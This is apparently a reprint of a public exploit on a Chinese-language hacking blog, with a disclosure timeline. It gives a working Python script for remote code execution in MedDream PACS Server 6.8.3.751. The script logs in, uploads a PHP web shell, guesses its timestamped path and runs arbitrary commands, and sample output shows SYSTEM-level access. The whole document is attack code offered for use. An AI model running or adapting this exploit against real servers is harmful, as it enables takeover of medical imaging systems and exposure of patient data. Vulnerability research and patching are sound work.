MedDream PACS Server 6.8.3.751-远程代码执行

MedDream PACS Server 6.8.3.751-远程代码执行(已验证)
#日期:2020-10-01
#易受攻击的软件:https://www.softeta.com/products/meddream-pacs-server/
#供应商主页:https://www.softeta.com
#版本:6.8.3.751
#测试:Windows 2016
#时间轴
#05-02-20:通过电子邮件提交事件,立即回复
#05-04-20:问题已解决,新版本发布6.8.3.1.751
#注意:核心漏洞存在于另一个已修复的产品中
#PoC公司#
#
#1。创建一行php shell来调用命令
#2。在攻击机器上运行脚本
#3。输入参数;IP、文件名、用户名、密码、命令

# root@kali:~# python meddream.py
# Enter IP Address: 192.168.0.223
# Enter payload filename + .php: cmd.php
# Enter Username: user1
# Enter Password: SoSecure!!
# Enter command: whoami
# 212357
# <pre>nt authority\system
# </pre>
# 404
# 404
# 404
# 404
# 404
# 404
# 404
# 404
# 404
#
#
from urllib2 import urlopen                       
from bs4 import BeautifulSoup
import requests
import sys
import time
from datetime import datetime, timedelta
ip_addr = raw_input("Enter IP Address: ")
user_file = raw_input("Enter payload filename + .php: ")
uname = raw_input("Enter Username: ")
pword = raw_input("Enter Password: ")
cmd = raw_input("Enter command: ")
URL1= 'http://' + ip_addr + '/Pacs/login.php'
URL2= 'http://' + ip_addr + '/Pacs/authenticate.php'
URL3= 'http://' + ip_addr + '/Pacs/uploadImage.php'
def main():
    session = requests.Session()
    site = session.get(URL1)
    
    soup = BeautifulSoup(site.content, "html.parser")
    antispam = soup.find("input", {"name":"formAntiSpam"})["value"]
    dbname = soup.find("input", {"name":"aetitle"})["value"]
    login_data = {
    'loginvalue': 'login',
    'aetitle': dbname,
    'username': uname,
    'password': pword,
    'formAntispam': antispam,
    'login': 'Login',
    }
    
    r = session.post(URL2, data = login_data)
   
    files = [
    ('actionvalue', (None, 'Attach', None)),
    ('uploadfile', (user_file, open(user_file, 'rb'), 'application/x-php')),
    ('action', (None, 'Attach', None)),
    ]
    r = session.post(URL3, files=files)
    today = datetime.today()
    upload_date = today.strftime("%Y%m%d")
    less = 1
    now1 = datetime.now()
    up_time1 = now1.strftime("%H%M%S")
    print(up_time1)
    #varying time checks +/-
    now2 = now1 - timedelta(seconds=less)
    up_time2 = now2.strftime("%H%M%S")
    now3 = now2 - timedelta(seconds=less)
    up_time3 = now3.strftime("%H%M%S")
    now4 = now3 - timedelta(seconds=less)
    up_time4 = now4.strftime("%H%M%S")
    now5 = now4 - timedelta(seconds=less)
    up_time5 = now5.strftime("%H%M%S")
    now6 = now5 - timedelta(seconds=less)
    up_time6 = now6.strftime("%H%M%S")
    now7 = now6 - timedelta(seconds=less)
    up_time7 = now7.strftime("%H%M%S")
    now8 = now1 + timedelta(seconds=less)
    up_time8 = now8.strftime("%H%M%S")
    now9 = now8 + timedelta(seconds=less)
    up_time9 = now8.strftime("%H%M%S")
    now10 = now1 + timedelta(seconds=less)
    up_time10 = now9.strftime("%H%M%S")
    up_time_array = [up_time1, up_time2, up_time3, up_time4, up_time5, up_time6, up_time7, up_time8, up_time9, up_time10] 
    for i in up_time_array:
        r = session.get('http://' + ip_addr + '/Pacs/upload/'+ upload_date + "-" + i + "--" + user_file + "?cmd=" + cmd)
        if r.status_code == 200:
            print r.content
            print r.url
        else:
            print ("404")
if __name__ == '__main__':
    main()

网站地址:https://www.hackzl.cn;发布者:hack之路,转转请注明出处:https://www.hackzl.cn/index.php/2020/10/08/meddream-pacs-server-6-8-3-751-%e8%bf%9c%e7%a8%8b%e4%bb%a3%e7%a0%81%e6%89%a7/

发表评论

邮箱地址不会被公开。 必填项已用*标注